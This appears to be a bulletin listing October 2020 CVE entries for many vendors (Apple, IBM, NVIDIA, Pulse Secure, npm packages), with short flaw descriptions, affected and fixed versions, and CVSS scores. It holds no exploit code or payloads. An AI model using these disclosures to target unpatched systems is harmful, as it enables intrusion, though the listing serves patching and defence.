antsword_project — antsword AntSword 2.1.8.1 contains a cross-site scripting (XSS) vulnerability in the View Site funtion. When viewing an added site, an XSS payload can be injected in cookies view which can lead to remote code execution. 2020-10-26 4.3 CVE-2020-25470
MISC
antsword_project — antsword A cross-site scripting (XSS) vulnerability AntSword v2.0.7 can remotely execute system commands. 2020-10-26 6.8 CVE-2020-18766
MISC
apple — airport_base_station_firmware A denial of service issue was addressed with improved memory handling. This issue is fixed in AirPort Base Station Firmware Update 7.8.1, AirPort Base Station Firmware Update 7.9.1. An attacker in a privileged position may be able to perform a denial of service attack. 2020-10-27 4 CVE-2019-7291
MISC
MISC
apple — airport_base_station_firmware The issue was addressed with improved data deletion. This issue is fixed in AirPort Base Station Firmware Update 7.8.1, AirPort Base Station Firmware Update 7.9.1. A base station factory reset may not delete all user information. 2020-10-27 5 CVE-2019-8575
MISC
MISC
apple — airport_base_station_firmware Source-routed IPv4 packets were disabled by default. This issue is fixed in AirPort Base Station Firmware Update 7.8.1, AirPort Base Station Firmware Update 7.9.1. Source-routed IPv4 packets may be unexpectedly accepted. 2020-10-27 5 CVE-2019-8580
MISC
MISC
apple — icloud Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 13, iCloud for Windows 7.14, iCloud for Windows 10.7, Safari 13, tvOS 13, watchOS 6, iTunes 12.10.1 for Windows. Processing maliciously crafted web content may lead to arbitrary code execution. 2020-10-27 6.8 CVE-2019-8728
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — icloud Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 13, iCloud for Windows 7.14, iCloud for Windows 10.7, Safari 13, tvOS 13, watchOS 6, iTunes 12.10.1 for Windows. Processing maliciously crafted web content may lead to arbitrary code execution. 2020-10-27 6.8 CVE-2019-8734
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — icloud Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in Safari 13.0.1, iOS 13.1 and iPadOS 13.1, iCloud for Windows 10.7, iCloud for Windows 7.14, tvOS 13, watchOS 6, iTunes 12.10.1 for Windows. Processing maliciously crafted web content may lead to arbitrary code execution. 2020-10-27 6.8 CVE-2019-8751
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — icloud Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in watchOS 5.2, iCloud for Windows 7.11, iOS 12.2, iTunes 12.9.4 for Windows, Safari 12.1. Processing maliciously crafted web content may lead to arbitrary code execution. 2020-10-27 6.8 CVE-2019-8639
MISC
MISC
MISC
MISC
MISC
apple — icloud Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in watchOS 5.2, iCloud for Windows 7.11, iOS 12.2, iTunes 12.9.4 for Windows, Safari 12.1. Processing maliciously crafted web content may lead to arbitrary code execution. 2020-10-27 6.8 CVE-2019-8638
MISC
MISC
MISC
MISC
MISC
apple — icloud The HTTP referrer header may be used to leak browsing history. The issue was resolved by downgrading all third party referrers to their origin. This issue is fixed in Safari 13.0.3, iTunes 12.10.2 for Windows, iCloud for Windows 10.9.2, tvOS 13.2, iOS 13.2 and iPadOS 13.2, iCloud for Windows 7.15. Visiting a maliciously crafted website may reveal the sites a user has visited. 2020-10-27 4.3 CVE-2019-8827
MISC
MISC
MISC
MISC
MISC
MISC
apple — icloud Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in Safari 13.0.1, iOS 13.1 and iPadOS 13.1, iCloud for Windows 10.7, iCloud for Windows 7.14, tvOS 13, watchOS 6, iTunes 12.10.1 for Windows. Processing maliciously crafted web content may lead to arbitrary code execution. 2020-10-27 6.8 CVE-2019-8752
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — icloud Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in Safari 13.0.1, iOS 13.1 and iPadOS 13.1, iCloud for Windows 10.7, iCloud for Windows 7.14, tvOS 13, watchOS 6, iTunes 12.10.1 for Windows. Processing maliciously crafted web content may lead to arbitrary code execution. 2020-10-27 6.8 CVE-2019-8773
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — icloud This issue was addressed with improved checks. This issue is fixed in tvOS 13.3, watchOS 6.1.1, iCloud for Windows 10.9, macOS Catalina 10.15.2, Security Update 2019-002 Mojave, and Security Update 2019-007 High Sierra, iOS 13.3 and iPadOS 13.3, iTunes 12.10.3 for Windows, iCloud for Windows 7.16. An application may be able to gain elevated privileges. 2020-10-27 6.8 CVE-2019-8848
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — icloud A validation issue was addressed with improved logic. This issue is fixed in Safari 13.0.1, iOS 13.1 and iPadOS 13.1, iCloud for Windows 10.7, tvOS 13, iCloud for Windows 7.14, iTunes 12.10.1 for Windows. Processing maliciously crafted web content may lead to universal cross site scripting. 2020-10-27 4.3 CVE-2019-8762
MISC
MISC
MISC
MISC
MISC
MISC
apple — icloud A memory corruption issue was addressed with improved state management. This issue is fixed in macOS Catalina 10.15, iOS 13, iCloud for Windows 10.7, macOS Catalina 10.15.1, Security Update 2019-001, and Security Update 2019-006, iCloud for Windows 7.14, iTunes 12.10.1 for Windows. Processing maliciously crafted web content may lead to arbitrary code execution. 2020-10-27 6.8 CVE-2019-8825
MISC
MISC
MISC
MISC
MISC
MISC
apple — icloud A configuration issue was addressed with additional restrictions. This issue is fixed in tvOS 13.3, watchOS 6.1.1, iCloud for Windows 10.9, macOS Catalina 10.15.2, Security Update 2019-002 Mojave, and Security Update 2019-007 High Sierra, iOS 13.3 and iPadOS 13.3, iTunes 12.10.3 for Windows, iCloud for Windows 7.16. An attacker in a privileged network position may be able to bypass HSTS for a limited number of specific top-level domains previously not in the HSTS preload list. 2020-10-27 4 CVE-2019-8834
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — icloud An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iCloud for Windows 7.12, tvOS 12.3, iTunes 12.9.5 for Windows, macOS Mojave 10.14.5, Security Update 2019-003 High Sierra, Security Update 2019-003 Sierra, iOS 12.3. Processing a maliciously crafted font may result in the disclosure of process memory. 2020-10-27 4.3 CVE-2019-8582
MISC
MISC
MISC
MISC
MISC
apple — icloud A memory consumption issue was addressed with improved memory handling. This issue is fixed in iCloud for Windows 7.7, watchOS 5, Safari 12, iOS 12, iTunes 12.9 for Windows, tvOS 12. Unexpected interaction causes an ASSERT failure. 2020-10-27 5 CVE-2018-4474
MISC
MISC
MISC
MISC
MISC
MISC
apple — icloud A logic issue was addressed with improved state management. This issue is fixed in iOS 12.1.3, iCloud for Windows 7.10, iTunes 12.9.3 for Windows, Safari 12.0.3, tvOS 12.1.2. Processing maliciously crafted web content may disclose sensitive user information. 2020-10-27 4.3 CVE-2019-8570
MISC
MISC
MISC
MISC
MISC
apple — ipad_os A resource exhaustion issue was addressed with improved input validation. This issue is fixed in iOS 13.1 and iPadOS 13.1, macOS Catalina 10.15. Parsing a maliciously crafted iBooks file may lead to a persistent denial-of-service. 2020-10-27 4.3 CVE-2019-8774
MISC
MISC
apple — ipad_os A memory corruption issue was addressed with improved state management. This issue is fixed in macOS Catalina 10.15, iOS 13.1 and iPadOS 13.1, tvOS 13, macOS Catalina 10.15.1, Security Update 2019-001, and Security Update 2019-006, watchOS 6. Processing a maliciously crafted audio file may lead to arbitrary code execution. 2020-10-27 6.8 CVE-2019-8706
MISC
MISC
MISC
MISC
MISC
apple — ipados An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Catalina 10.15, iOS 13.1 and iPadOS 13.1, tvOS 13, macOS Catalina 10.15.1, Security Update 2019-001, and Security Update 2019-006, watchOS 6. Processing a maliciously crafted audio file may disclose restricted memory. 2020-10-27 4.3 CVE-2019-8850
MISC
MISC
MISC
MISC
MISC
apple — ipados A logic issue was addressed with improved validation. This issue is fixed in macOS Catalina 10.15.1, Security Update 2019-001, and Security Update 2019-006, iOS 12.4.3, watchOS 6.1, iOS 13.2 and iPadOS 13.2. AirDrop transfers may be unexpectedly accepted while in Everyone mode. 2020-10-27 4.3 CVE-2019-8796
MISC
MISC
MISC
MISC
apple — ipados An API issue existed in the handling of outgoing phone calls initiated with Siri. This issue was addressed with improved state handling. This issue is fixed in iOS 13.3 and iPadOS 13.3, watchOS 6.1.1, macOS Catalina 10.15.2, Security Update 2019-002 Mojave, and Security Update 2019-007 High Sierra. Calls made using Siri may be initiated using the wrong cellular plan on devices with two active plans. 2020-10-27 4.3 CVE-2019-8856
MISC
MISC
MISC
apple — ipados This issue was addressed by verifying host keys when connecting to a previously-known SSH server. This issue is fixed in iOS 13.1 and iPadOS 13.1. An attacker in a privileged network position may be able to intercept SSH traffic from the “Run script over SSH” action. 2020-10-27 4 CVE-2019-8901
MISC
apple — iphone_os This issue was addressed with improved checks. This issue is fixed in macOS Catalina 10.15, watchOS 6, iOS 13, tvOS 13. Processing maliciously crafted web content may lead to a cross site scripting attack. 2020-10-27 4.3 CVE-2019-8753
MISC
MISC
MISC
MISC
apple — iphone_os A resource exhaustion issue was addressed with improved input validation. This issue is fixed in tvOS 12.1, iOS 12.1. Processing a maliciously crafted message may lead to a denial of service. 2020-10-27 4.3 CVE-2018-4381
MISC
MISC
apple — iphone_os A memory corruption issue was addressed with improved input validation. This issue is fixed in macOS Catalina 10.15, tvOS 12.3, watchOS 5.2.1, tvOS 13, macOS Catalina 10.15.1, Security Update 2019-001, and Security Update 2019-006, macOS Mojave 10.14.5, Security Update 2019-003 High Sierra, Security Update 2019-003 Sierra, iOS 12.3, iOS 13. Playing a malicious audio file may lead to arbitrary code execution. 2020-10-27 6.8 CVE-2019-8592
MISC
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — iphone_os A logic issue was addressed with improved state management. This issue is fixed in macOS Mojave 10.14.4, Security Update 2019-002 High Sierra, Security Update 2019-002 Sierra, tvOS 12.3, watchOS 5.2.1, macOS Mojave 10.14.5, Security Update 2019-003 High Sierra, Security Update 2019-003 Sierra, iOS 12.3. An attacker in a privileged network position can modify driver state. 2020-10-27 4 CVE-2019-8612
MISC
MISC
MISC
MISC
MISC
apple — iphone_os A memory corruption issue existed in the handling of IPv6 packets. This issue was addressed with improved memory management. This issue is fixed in macOS Catalina 10.15, tvOS 13, macOS Catalina 10.15.1, Security Update 2019-001, and Security Update 2019-006, watchOS 6, iOS 13. A malicious application may be able to determine kernel memory layout. 2020-10-27 4.3 CVE-2019-8744
MISC
MISC
MISC
MISC
MISC
apple — iphone_os A denial of service issue was addressed with improved validation. This issue is fixed in iOS 12.4, tvOS 12.4, watchOS 5.3. Processing a maliciously crafted image may lead to a denial of service. 2020-10-27 4.3 CVE-2019-8668
MISC
MISC
MISC
apple — iphone_os An input validation issue was addressed with improved input validation. This issue is fixed in iOS 12.3, watchOS 5.2.1. Processing a maliciously crafted message may lead to a denial of service. 2020-10-27 4.3 CVE-2019-8664
MISC
MISC
apple — iphone_os A user privacy issue was addressed by removing the broadcast MAC address. This issue is fixed in macOS Catalina 10.15, watchOS 6, iOS 13, tvOS 13. A device may be passively tracked by its Wi-Fi MAC address. 2020-10-27 5 CVE-2019-8854
MISC
MISC
MISC
MISC
apple — iphone_os A denial of service issue was addressed with improved validation. This issue is fixed in watchOS 5.2, macOS Mojave 10.14.4, Security Update 2019-002 High Sierra, Security Update 2019-002 Sierra, iOS 12.2. Processing a maliciously crafted vcf file may lead to a denial of service. 2020-10-27 4.3 CVE-2019-8538
MISC
MISC
MISC
apple — iphone_os A permissions issue was addressed by removing vulnerable code and adding additional checks. This issue is fixed in watchOS 5.2, iOS 12.2. A malicious application may be able to access restricted files. 2020-10-27 4.3 CVE-2019-8532
MISC
MISC
apple — iphone_os An inconsistent user interface issue was addressed with improved state management. This issue is fixed in macOS High Sierra 10.13.1, Security Update 2017-001 Sierra, and Security Update 2017-004 El Capitan, watchOS 4.3, iOS 12.1. Processing a maliciously crafted text message may lead to UI spoofing. 2020-10-27 4.3 CVE-2018-4391
MISC
MISC
MISC
apple — iphone_os A logic issue was addressed with improved restrictions. This issue is fixed in watchOS 5.2, macOS Mojave 10.14.4, Security Update 2019-002 High Sierra, Security Update 2019-002 Sierra, iOS 12.2. A sandboxed process may be able to circumvent sandbox restrictions. 2020-10-27 5 CVE-2019-8618
MISC
MISC
MISC
apple — iphone_os A logic issue was addressed with improved state management. This issue is fixed in macOS Mojave 10.14.5, Security Update 2019-003 High Sierra, Security Update 2019-003 Sierra, iOS 12.3, tvOS 12.3. Users removed from an iMessage conversation may still be able to alter state. 2020-10-27 5 CVE-2019-8631
MISC
MISC
MISC
apple — iphone_os A validation issue was addressed with improved input sanitization. This issue is fixed in macOS Mojave 10.14.5, Security Update 2019-003 High Sierra, Security Update 2019-003 Sierra, iOS 12.3, tvOS 12.3, watchOS 5.3. An application may be able to read restricted memory. 2020-10-27 5 CVE-2019-8633
MISC
MISC
MISC
MISC
apple — iphone_os An inconsistent user interface issue was addressed with improved state management. This issue is fixed in macOS High Sierra 10.13.1, Security Update 2017-001 Sierra, and Security Update 2017-004 El Capitan, watchOS 4.3, iOS 12.1. Processing a maliciously crafted text message may lead to UI spoofing. 2020-10-27 4.3 CVE-2018-4390
MISC
MISC
MISC
apple — itunes A logic issue was addressed with improved state management. This issue is fixed in Safari 12.0.2, iOS 12.1.1, tvOS 12.1.1, iTunes 12.9.2 for Windows. Processing maliciously crafted web content may disclose sensitive user information. 2020-10-27 4.3 CVE-2018-4444
MISC
MISC
MISC
MISC
apple — itunes An information disclosure issue existed in the handling of the Storage Access API. This issue was addressed with improved logic. This issue is fixed in iOS 13.3 and iPadOS 13.3, tvOS 13.3, Safari 13.0.4, iTunes 12.10.3 for Windows. Visiting a maliciously crafted website may reveal sites a user has visited. 2020-10-27 4.3 CVE-2019-8898
MISC
MISC
MISC
MISC
apple — mac_os_x This issue was addressed by removing additional entitlements. This issue is fixed in macOS Mojave 10.14.1, Security Update 2018-002 High Sierra, Security Update 2018-005 Sierra. A malicious application may be able to access restricted files. 2020-10-27 4.3 CVE-2018-4468
MISC
apple — mac_os_x A memory corruption issue was addressed with improved state management. This issue is fixed in macOS Catalina 10.15. Processing maliciously crafted web content may lead to arbitrary code execution. 2020-10-27 6.8 CVE-2019-8826
MISC
apple — mac_os_x An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Catalina 10.15.7, Security Update 2020-005 High Sierra, Security Update 2020-005 Mojave. Processing a maliciously crafted image may lead to arbitrary code execution. 2020-10-27 6.8 CVE-2020-9961
MISC
apple — mac_os_x A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks. This issue is fixed in macOS Mojave 10.14.4, Security Update 2019-002 High Sierra, Security Update 2019-002 Sierra. Processing a maliciously crafted package may lead to arbitrary code execution. 2020-10-27 6.8 CVE-2019-6238
MISC
apple — mac_os_x A logic issue was addressed with improved validation. This issue is fixed in macOS Mojave 10.14.4, Security Update 2019-002 High Sierra, Security Update 2019-002 Sierra. An attacker in a privileged network position can modify driver state. 2020-10-27 5 CVE-2019-8564
MISC
apple — mac_os_x A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Mojave 10.14.6, Security Update 2019-004 High Sierra, Security Update 2019-004 Sierra. An attacker in a privileged network position may be able to execute arbitrary code. 2020-10-27 6.5 CVE-2019-8696
MISC
apple — mac_os_x This issue was addressed with improved checks. This issue is fixed in macOS Catalina 10.15.1, Security Update 2019-001, and Security Update 2019-006, macOS Catalina 10.15. Parsing a maliciously crafted text file may lead to disclosure of user information. 2020-10-27 4.3 CVE-2019-8761
MISC
MISC
apple — mac_os_x A cross-origin issue existed with “iframe” elements. This was addressed with improved tracking of security origins. This issue is fixed in macOS Catalina 10.15.1, Security Update 2019-001, and Security Update 2019-006. A malicious HTML document may be able to render iframes with sensitive user information. 2020-10-27 4.3 CVE-2019-8754
MISC
apple — mac_os_x An access issue was addressed with improved access restrictions. This issue is fixed in macOS Catalina 10.15.3, Security Update 2020-001 Mojave, Security Update 2020-001 High Sierra. A malicious application may be able to overwrite arbitrary files. 2020-10-27 5.8 CVE-2020-3855
MISC
apple — mac_os_x This issue was addressed by removing the vulnerable code. This issue is fixed in macOS Catalina 10.15.1, Security Update 2019-001, and Security Update 2019-006, macOS Catalina 10.15. A malicious application may be able to elevate privileges. 2020-10-27 6.8 CVE-2019-8509
MISC
MISC
apple — mac_os_x A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Mojave 10.14.6, Security Update 2019-004 High Sierra, Security Update 2019-004 Sierra. An attacker in a privileged network position may be able to execute arbitrary code. 2020-10-27 6.5 CVE-2019-8675
MISC
apple — mac_os_x A memory corruption issue was addressed with improved state management. This issue is fixed in macOS Mojave 10.14.3, Security Update 2019-001 High Sierra, Security Update 2019-001 Sierra, macOS Mojave 10.14.2, Security Update 2018-003 High Sierra, Security Update 2018-006 Sierra. A malicious application may be able to elevate privileges. 2020-10-27 6.8 CVE-2018-4467
MISC
MISC
apple — mac_os_x An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Catalina 10.15.1, Security Update 2019-001, and Security Update 2019-006, macOS Catalina 10.15. A local user may be able to cause unexpected system termination or read kernel memory. 2020-10-27 6.6 CVE-2019-8759
MISC
MISC
apple — mac_os_x This issue was addressed with improved checks This issue is fixed in macOS Catalina 10.15.4, Security Update 2020-002 Mojave, Security Update 2020-002 High Sierra. An application may be able to trigger a sysdiagnose. 2020-10-27 4.3 CVE-2020-9786
MISC
apple — mac_os_x An issue existed in the parsing of URLs. This issue was addressed with improved input validation. This issue is fixed in macOS Catalina 10.15.5, Security Update 2020-003 Mojave, Security Update 2020-003 High Sierra. A malicious website may be able to exfiltrate autofilled data in Safari. 2020-10-27 4.3 CVE-2020-9857
MISC
apple — mac_os_x An access issue was addressed with additional sandbox restrictions. This issue is fixed in macOS Catalina 10.15. A malicious application may be able to access restricted files. 2020-10-27 4.3 CVE-2019-8855
MISC
apple — mac_os_x A validation issue was addressed with improved input sanitization. This issue is fixed in macOS Catalina 10.15.4, Security Update 2020-002 Mojave, Security Update 2020-002 High Sierra, macOS Catalina 10.15.2, Security Update 2019-002 Mojave, and Security Update 2019-007 High Sierra. An application may be able to read restricted memory. 2020-10-27 4.3 CVE-2019-8853
MISC
MISC
apple — mac_os_x A buffer overflow was addressed with improved bounds checking. This issue is fixed in macOS Catalina 10.15.2, Security Update 2019-002 Mojave, and Security Update 2019-007 High Sierra. An attacker in a privileged position may be able to perform a denial of service attack. 2020-10-27 4.3 CVE-2019-8839
MISC
apple — mac_os_x An input validation issue was addressed with improved memory handling. This issue is fixed in macOS Mojave 10.14.4, Security Update 2019-002 High Sierra, Security Update 2019-002 Sierra. An application may be able to gain elevated privileges. 2020-10-27 4.6 CVE-2019-8579
MISC
apple — mac_os_x An input validation issue was addressed with improved input validation. This issue is fixed in macOS Catalina 10.15.1, Security Update 2019-001, and Security Update 2019-006, macOS Catalina 10.15. An attacker in a privileged network position may be able to leak sensitive user information. 2020-10-27 4 CVE-2019-8736
MISC
MISC
apple — mac_os_x A denial of service issue was addressed with improved validation. This issue is fixed in macOS Catalina 10.15.1, Security Update 2019-001, and Security Update 2019-006, macOS Catalina 10.15. An attacker in a privileged position may be able to perform a denial of service attack. 2020-10-27 4 CVE-2019-8737
MISC
MISC
apple — mac_os_x This issue was addressed with improved checks. This issue is fixed in macOS Catalina 10.15.7, Security Update 2020-005 High Sierra, Security Update 2020-005 Mojave. A remote attacker may be able to unexpectedly alter application state. 2020-10-27 5 CVE-2020-9941
MISC
apple — mac_os_x An issue existed with Siri Suggestions access to encrypted data. The issue was fixed by limiting access to encrypted data. This issue is fixed in macOS Catalina 10.15.3, Security Update 2020-001 Mojave, Security Update 2020-001 High Sierra. Encrypted data may be inappropriately accessed. 2020-10-27 5 CVE-2020-9774
MISC
apple — music This issue was addressed with improved checks to prevent unauthorized actions. This issue is fixed in Apple Music 3.4.0 for Android. A malicious application may be able to leak a user’s credentials. 2020-10-27 4.3 CVE-2020-9982
MISC
apple — safari A custom URL scheme handling issue was addressed with improved input validation. This issue is fixed in Safari 13.0.5. Processing a maliciously crafted URL may lead to arbitrary javascript code execution. 2020-10-27 5.8 CVE-2020-9860
MISC
apple — safari This issue was addressed with improved iframe sandbox enforcement. This issue is fixed in Safari 13.0.1, iOS 13. Maliciously crafted web content may violate iframe sandboxing policy. 2020-10-27 4.3 CVE-2019-8771
MISC
MISC
arubanetworks — airwave_glass A remote escalation of privilege vulnerability was discovered in Aruba Airwave Software version(s): Prior to 1.3.2. 2020-10-26 6.5 CVE-2020-7125
MISC
arubanetworks — airwave_glass A remote server-side request forgery (ssrf) vulnerability was discovered in Aruba Airwave Software version(s): Prior to 1.3.2. 2020-10-26 5 CVE-2020-7126
MISC
belkin — linksys_wrt_160nl_firmware ** UNSUPPORTED WHEN ASSIGNED ** Belkin LINKSYS WRT160NL 1.0.04.002_US_20130619 devices have a stack-based buffer overflow vulnerability because of sprintf in create_dir in mini_httpd. Successful exploitation leads to arbitrary code execution. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. 2020-10-23 6.5 CVE-2020-26561
MISC
checkpoint — zonealarm Check Point ZoneAlarm before version 15.8.139.18543 allows a local actor to escalate privileges while restoring files in Anti-Ransomware. 2020-10-27 4.6 CVE-2020-6023
MISC
fireeye — email_malware_protection_system eMPS prior to eMPS 9.0 FireEye EX 3500 devices allows remote authenticated users to conduct SQL injection attacks via the sort, sort_by, search{URL], or search[attachment] parameter to the email search feature. 2020-10-26 4 CVE-2020-25034
MISC
fruitywifi_project — fruitywifi A Cross-Site Request Forgery (CSRF) vulnerability is identified in FruityWifi through 2.4. Due to a lack of CSRF protection in page_config_adv.php, an unauthenticated attacker can lure the victim to visit his website by social engineering or another attack vector. Due to this issue, an unauthenticated attacker can change the newSSID and hostapd_wpa_passphrase. 2020-10-23 4.3 CVE-2020-24847
MISC
getgophish — gophish Gophish through 0.10.1 does not invalidate the gophish cookie upon logout. 2020-10-28 5 CVE-2020-24713
MISC
getgophish — gophish Gophish before 0.11.0 allows SSRF attacks. 2020-10-28 5 CVE-2020-24710
MISC
MISC
MISC
getgophish — gophish The Reset button on the Account Settings page in Gophish before 0.11.0 allows attackers to cause a denial of service via a clickjacking attack 2020-10-28 4.3 CVE-2020-24711
MISC
MISC
MISC
git-tag-annotation-action_project — git-tag-annotation-action In the git-tag-annotation-action (open source GitHub Action) before version 1.0.1, an attacker can execute arbitrary (*) shell commands if they can control the value of [the `tag` input] or manage to alter the value of [the `GITHUB_REF` environment variable]. The problem has been patched in version 1.0.1. If you don’t use the `tag` input you are most likely safe. The `GITHUB_REF` environment variable is protected by the GitHub Actions environment so attacks from there should be impossible. If you must use the `tag` input and cannot upgrade to `> 1.0.0` make sure that the value is not controlled by another Action. 2020-10-26 6.5 CVE-2020-15272
MISC
MISC
CONFIRM
grafana — grafana Grafana before 7.1.0-beta 1 allows XSS via a query alias for the ElasticSearch datasource. 2020-10-28 4.3 CVE-2020-24303
MISC
MISC
hp — bluedata_epic The HPE BlueData EPIC Software Platform version 4.0 and HPE Ezmeral Container Platform 5.0 use an insecure method of handling sensitive Kerberos passwords that is susceptible to unauthorized interception and/or retrieval. Specifically, they display the kdc_admin_password in the source file of the url “/bdswebui/assignusers/”. 2020-10-26 4 CVE-2020-7196
MISC
ibm — i2_ibase IBM i2 iBase 8.9.13 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 184574. 2020-10-30 5 CVE-2020-4584
XF
CONFIRM
ibm — i2_ibase IBM i2 iBase 8.9.13 could allow an attacker to upload arbitrary executable files which, when executed by an unsuspecting victim could result in code execution. IBM X-Force ID: 184579. 2020-10-30 6.8 CVE-2020-4588
XF
CONFIRM
ibm — security_directory_server IBM Security Directory Server 6.4.0 does not set the secure attribute on authorization tokens or session cookies. Attackers may be able to get the cookie values by sending a http:// link to a user or by planting this link in a site the user goes to. The cookie will be sent to the insecure link and the attacker can then obtain the cookie value by snooping the traffic. IBM X-Force ID: 166624. 2020-10-29 5 CVE-2019-4563
XF
CONFIRM
ibm — security_directory_server IBM Security Directory Server 6.4.0 generates an error message that includes sensitive information about its environment, users, or associated data. IBM X-Force ID: 165949. 2020-10-29 5 CVE-2019-4547
XF
CONFIRM
ibm — sterling_connect IBM Sterling Connect Direct for Microsoft Windows 4.7, 4.8, 6.0, and 6.1 could allow a remote attacker to cause a denial of service, caused by a buffer over-read. Bysending a specially crafted request, the attacker could cause the application to crash. IBM X-Force ID: 188906. 2020-10-28 5 CVE-2020-4767
XF
CONFIRM
ibm — websphere_application_server IBM WebSphere Application Server 7.0, 8.0, 8.5, and 9.0 could allow a remote attacker to traverse directories on the system. An attacker could send a specially-crafted URL request containing “dot dot” sequences (/../) to view arbitrary files on the system. 2020-10-28 4 CVE-2020-4782
XF
CONFIRM
iobit — malware_fighter An issue exits in IOBit Malware Fighter version 8.0.2.547. Local escalation of privileges is possible by dropping a malicious DLL file into the WindowsApps folder. 2020-10-27 6.9 CVE-2020-23864
MISC
konzept-ix — publixone konzept-ix publiXone before 2020.015 allows attackers to download files by iterating over the IXCopy fileID parameter. 2020-10-27 5 CVE-2020-27180
MISC
MISC
konzept-ix — publixone A hardcoded AES key in CipherUtils.java in the Java applet of konzept-ix publiXone before 2020.015 allows attackers to craft password-reset tokens or decrypt server-side configuration files. 2020-10-27 6.4 CVE-2020-27181
MISC
MISC
konzept-ix — publixone Multiple cross-site scripting (XSS) vulnerabilities in konzept-ix publiXone before 2020.015 allow remote attackers to inject arbitrary JavaScript or HTML via appletError.jsp, job_jacket_detail.jsp, ixedit/editor_component.jsp, or the login form. 2020-10-27 4.3 CVE-2020-27182
MISC
MISC
motion_project — motion A Denial of Service condition in Motion-Project Motion 3.2 through 4.3.1 allows remote unauthenticated users to cause a webu.c segmentation fault and kill the main process via a crafted HTTP request. 2020-10-26 5 CVE-2020-26566
MISC
MISC
MISC
neopost — neopost_mail_accounting NeoPost Mail Accounting Software Pro 5.0.6 allows php/Commun/FUS_SCM_BlockStart.php?code= XSS. 2020-10-28 4.3 CVE-2020-27974
MISC
netapp — clustered_data_ontap Clustered Data ONTAP versions 9.7 through 9.7P7 are susceptible to a vulnerability which allows an attacker with access to an intercluster LIF to cause a Denial of Service (DoS). 2020-10-27 5 CVE-2020-8579
MISC
npmjs — npm-user-validate This affects the package npm-user-validate before 1.0.1. The regex that validates user emails took exponentially longer to process long input strings beginning with @ characters. 2020-10-27 5 CVE-2020-7754
CONFIRM
CONFIRM
CONFIRM
CONFIRM
nvidia — geforce_experience NVIDIA GeForce Experience, all versions prior to 3.20.5.70, contains a vulnerability in NVIDIA Web Helper NodeJS Web Server in which an uncontrolled search path is used to load a node module, which may lead to code execution, denial of service, escalation of privileges, and information disclosure. 2020-10-23 4.4 CVE-2020-5977
CONFIRM
nvidia — geforce_experience NVIDIA GeForce Experience, all versions prior to 3.20.5.70, contains a vulnerability in the ShadowPlay component which may lead to local privilege escalation, code execution, denial of service or information disclosure. 2020-10-23 4.6 CVE-2020-5990
CONFIRM
nvidia — geforce_experience NVIDIA GeForce Experience, all versions prior to 3.20.5.70, contains a vulnerability in its services in which a folder is created by nvcontainer.exe under normal user login with LOCAL_SYSTEM privileges which may lead to a denial of service or escalation of privileges. 2020-10-23 4.6 CVE-2020-5978
CONFIRM
octopus — octopus_deploy In Octopus Deploy through 2020.4.2, an attacker could redirect users to an external site via a modified HTTP Host header. 2020-10-26 5.8 CVE-2020-26161
MISC
MISC
open-xchange — open-xchange_appsuite OX App Suite through 7.10.3 allows SSRF via the the /ajax/messaging/message message API. 2020-10-23 4 CVE-2020-15002
CONFIRM
MISC
open-xchange — open-xchange_appsuite OX App Suite through 7.10.3 allows Information Exposure because a user can obtain the IP address and User-Agent string of a different user (via the session API during shared Drive access). 2020-10-23 4 CVE-2020-15003
CONFIRM
MISC
oscommerce — oscommerce osCommerce Phoenix CE before 1.0.5.4 allows admin/define_language.php CSRF. 2020-10-28 6.8 CVE-2020-27975
MISC
pulsesecure — pulse_secure_desktop_client A vulnerability in the Pulse Connect Secure < 9.1R9 admin web interface could allow an authenticated attacker to perform an arbitrary code execution using uncontrolled gzip extraction. 2020-10-28 6.5 CVE-2020-8260
MISC
pulsesecure — pulse_secure_desktop_client A vulnerability in the Pulse Secure Desktop Client (Linux) < 9.1R9 could allow local attackers to escalate privilege. 2020-10-28 4.6 CVE-2020-8250
MISC
pulsesecure — pulse_secure_desktop_client A vulnerability in the Pulse Secure Desktop Client (Linux) < 9.1R9 could allow local attackers to escalate privilege. 2020-10-28 4.6 CVE-2020-8248
MISC
pulsesecure — pulse_secure_desktop_client A vulnerability in the Pulse Connect Secure < 9.1R9 admin web interface could allow an authenticated attacker to perform an arbitrary file reading vulnerability is fixed using encrypted URL blacklisting that prevents these messages. 2020-10-28 4 CVE-2020-8255
MISC
sonicwall — global_vpn_client SonicWall Global VPN client version 4.10.4.0314 and earlier have an insecure library loading (DLL hijacking) vulnerability. Successful exploitation could lead to remote code execution in the target system. 2020-10-28 6.9 CVE-2020-5145
CONFIRM
systeminformation — systeminformation This affects the package systeminformation before 4.27.11. This package is vulnerable to Command Injection. The attacker can concatenate curl’s parameters to overwrite Javascript files and then execute any OS commands. 2020-10-26 6.5 CVE-2020-7752
CONFIRM
CONFIRM
CONFIRM
thembay — greenmart The search functionality of the Greenmart theme 2.4.2 for WordPress is vulnerable to XSS. 2020-10-27 4.3 CVE-2020-16140
MISC
trim_project — trim All versions of package trim are vulnerable to Regular Expression Denial of Service (ReDoS) via trim(). 2020-10-27 5 CVE-2020-7753
MISC
MISC
MISC
MISC
verifone — mx900_firmware Verifone MX900 series Pinpad Payment Terminals with OS 30251000 have a race condition for RBAC bypass. 2020-10-23 4.4 CVE-2019-14711
MISC
